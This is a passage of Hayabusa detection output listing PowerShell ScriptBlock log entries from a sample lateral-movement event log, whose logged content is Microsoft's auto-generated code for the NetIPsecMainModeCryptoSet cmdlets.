[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 